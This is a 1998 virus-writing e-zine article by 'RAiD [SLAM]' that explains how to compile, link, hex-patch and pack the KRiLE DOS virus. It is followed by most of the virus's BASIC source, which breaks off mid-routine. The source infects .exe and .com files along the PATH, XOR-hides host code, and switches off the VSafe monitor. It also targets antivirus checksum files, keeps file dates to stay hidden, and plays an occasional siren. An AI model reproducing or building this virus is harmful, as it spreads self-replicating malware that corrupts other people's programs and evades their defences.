SLAM4.050: Kryle 1.0c by Raid/SLAM
How to compile the KRiLE source
Written by: RAiD [SLAM] 02/19/98
For some time now, various KRiLE source code has been circulated, but no real instructions were given for compiling them. And since there not pure asm, there not as easy to assemble/compile. Well, I decided after much pressure (heh) to write an article on compiling those and various other viruses of mine. I would appreciate it if you would NOT use this information to compile cheap hacks of my viruses. Now first things first, you will need the following in order to compile even one of my viruses. You will also need to be somewhat handy with a hex editor. You will need the asic compiler version 5. (A www search will find it for you, it's available on almost any shareware site. IE: simtel). You'll also need a linker, I personally recommend MicroSofts LINK.EXE (Mine was taken from quickbasic v4.5). With any luck, link.exe is with this article. The krile sources always include a bug.lib, or an equivalent, this file was not put there for the hell of it. Some of KRiLE's routines are pure asm, and for ease, are stored in bug.lib. Compiling KRiLE can be a lengthy procedure, but..shit, it's an HLL virus. so..<g> We'll compile KRiLE v1.0c for our example. (Source is included in krile.asi). from a dos prompt (I don't use asics gui much). you will type ASICC KRILE E B/OBJ. Once you do that, asic will try and call your linker and you'll get several errors. Your now ready for the next step. Pay close attention. LINK /CPARMAXALLOC:1500 KRILE.OBJ. LINK will eventually ask for a library name, BUG.LIB is what you enter. Once link is finished the exe is ready for hex editing, and then, compressing (lzexe/xpack/tinyprog) or whatever. Now fire up your favorite hex editor (I use hexedit), and load KRILE.EXE. Then, search for the string "1234", make a note of where this is since you will need to replace it with the contents of KRILE.ID (only the first 4 bytes!) This string is the previous infection marker. You might as well go ahead and replace it now. Next, you will be looking for the following: exename, criterror!, findfirstf, findnextf, getname, path, sound replace those with nulls. Those are the names of the external routines that are linked in. You're nulling them out for a greater compression ratio. Once you have this done, leave the hex editor, saving your changes of course KRiLE v1.0c is preconfigured to be compressed with XPACK v1.67l (again, a www search will find this little gem.) type xpack -v- -4 krile.exe. Open your hex-editor again, and load krile.exe. goto decimal offset 28, See those 4 bytes? "xpak" You'll be replacing them with KRILE.ID (remember! only the first 4 bytes!). Once you have replaced them, search for "EXE" (You'll find 30 bytes worth of ASCII text.) Replace those 30 bytes starting at the E with random characters. Do NOT go past 30! Now save your changes, and exit your editor. You have just compiled a working KRiLE.
This is the basic idea for compiling all of my viruses, naturally you will need to change the source or find a different compressor depending on the virus. Study the source code, and you'll see where changes are required.
Greetz to:
- David Visti - Creator of the ASiC compiler! Unf
- JQ/29a - Encouragement..heh
- SLAM - Dealing with my constant late articles, and rare emails. (I'm such a lazy bastard).
- Paw[FS] - Burning are ya? :-)
And of course, I can't forget AVP..(yea av), gotta love that scanner!
;================================= cut here =================================
rem KRiLE v1.0c written by RAiD for [SLAM]
rem An experimental virus, Which *should* get around tbfile and nav
rem if they happen to be resident.
dim virus_data(2940)
dim host_data(2940)
call sub"Criterror!"
randomize
virus_size=5880
virus_size&=5880&
virus_sig$="1234"
exe$="*.exe"
com$="*.com"
killfil1$="anti-vir.dat"
killfil2$="chklist.ms"
killfil3$="chklist.cps"
krsig1$="˛KRiLE˛ v1.0c - When will u learn AV? (c) by RAiD UsA [SLAM]97"
notouch$="Command|staRt|emm386|mscdex|explorer|mouse|smartdrv|setver|dos4gw"
vsafe_stats=0
gosub vsafe_toggle:
vsafe_stats=cx
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
gosub chksum_die:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, we have an image loaded, let's scan the current directory
rem for use-able hosts. We also deal with any checksum files during
rem this scan.
gosub cur_dir:
rem Now, were going to find out just how many paths there are
gosub path_search:
rem We are now ready to proceed path infection, after we make one
rem safety check. (this prevents Division By zero errors)
rem Before setting, Ensure loc does *not* equal 0. If by some sad-chance
rem it does, We do *not* even attempt path infection!
target=1
range=loc
if range=0 then
virupath$=""
goto done:
endif
gosub rand_num:
total=a
rem If we made it this far, We have determined how many paths
rem There actually are. and how many we will infect. Now, let's
rem decide which ones of that total are to be infected.
exit=0
tally=-1
while exit=0
tally=tally+1
range=loc
gosub rand_num:
n=a
gosub path_infect:
if tally=total then
exit=1
endif
wend
done:
target=0
rem We're almost finished. Prepare the host for control passing.
filename$=hostname$
gosub hide_host:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub cypher_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
gosub res_host:
rem Ok, siren anyone?
rem a value of 256 ensures the siren is rare, which means this
rem virus won't be detected right off the bat. No sense calling
rem attention to ourselves too soon. :)
range=256
gosub rand_num:
if a=19 then
gosub siren:
endif
call hostname$, yourparm$
r=vsafe_stats
vsafe_stats=0
gosub vsafe_toggle:
vsafe_stats=r
filename$=hostname$
rem Let's make sure we don't accidently infect the host a second
rem time. Happens rarely, but a good safety precaution anyways.
rem Besides, doesn't eat much more code space.
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
rem Check the current directory again, Host might have created
rem some new targets. pkunzip.exe being a good example. Note: This
rem allows my virus to resemble TSR based viruses somewhat.
gosub cur_dir:
gosub vsafe_toggle:
rem The range was already set at 256, we'll leave it
rem as it is. and get us a number :)
range=256
gosub rand_num:
if a=19 then
gosub say_hi:
endif
rem The end has been reached, return to operating system or calling
rem program.
end
start_virus:
errcode=0
attr=6
kewl=0
rem Setup rand-generator range to 4, and decide how many files
rem were going to infect for this run :)
range=2
gosub rand_num:
virii=a
rem Ok, decision made, let's infect!
CALL SUB "FindFirstF" proc$ Attr ErrCode
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND
return
Lets_infect:
rem Lets put our virus into the file shall we? :)
gosub hide_host:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub cypher_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
gosub res_host:
return
rem miscallenous file i/o routines beyond this point. Boring to look
rem at.:)
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
vsafe_toggle:
ax=&hexfa02
dx=&hex5945
bx=vsafe_stats
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem Moves file pointer from start of file to whereever I wanna go
rem Routine called is patched(hacked) from asilib.lib
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
cypher_host:
y=varptr(host_data(0))
z=y+virus_size
for x=y to z
a=peek(x)
ax=a
bx=x
rem Shrug, asic has no built in XOR routine, so we
rem chat with the CPU ourselves to XOR it :)
SETREGS (AX,BX,NA,NA,NA,NA,NA,NA,NA)
CODE &HEX31, &HEXD8
GETREGS (AX,NA,NA,NA,NA,NA,NA,NA,NA)
rem ENd of cpu-xor chat
poke x,ax
next x
return
infect_check:
rem routine checks for files to avoid, size validation and to make
rem sure the file is not already infected. If any of the routines
rem return infected=1 then the rest of the file i/o does not
rem occur (saves a few miliseconds i/o time)
infected=0
gosub do_not_touch:
if infected=0 then
gosub size_check:
endif
if infected=0 then
gosub prev_check:
endif
return
prev_check:
rem Is this file already infected?
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=" "
gosub open_file:
move_way&=28
gosub move_file_pointer:
dx=varptr(sig$)
bytesize=4
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
if sig$=virus_sig$ then
infected=1
endif
if file_handle<5 then
rem We couldn't open the damn file to check, assume it is indeed
rem infected. and let's not fool with it. :)
infected=1
endif
return
strip_garbage:
rem This routine quickly scrapes off the appended data
rem we wrote during the infection process
gosub open_file:
move_way&=hosttemp&
gosub move_file_pointer:
dx=0
bytesize=0
gosub write_file:
gosub set_fdt:
gosub close_file:
return
do_not_touch:
rem Make sure the following files are NOT infected or
rem otherwise tampered with. This routine actually
rem seperates the filename from its path and extension
rem then proceeds to compare it.
a$=filename$
b=len(a$)
b=b-4
b$=left$(a$,b)
b=len(b$)
d=varptr(b$)
c=d+b
e=-1
exit=0
while exit=0
a=peek(c)
e$=chr$(a)
if e$="\" then
exit=1
else
e=e+1
c=c-1
endif
wend
file_name$=right$(b$,e)
file_name$=ucase$(file_name$)
notouch$=ucase$(notouch$)
b=instr(notouch$,file_name$)
if b>0 then
infected=1
endif
return
size_check:
rem make sure the target file is larger then our virus
rem if it's not, we must not bother to infect it.
a&=filelen(filename$)
if a&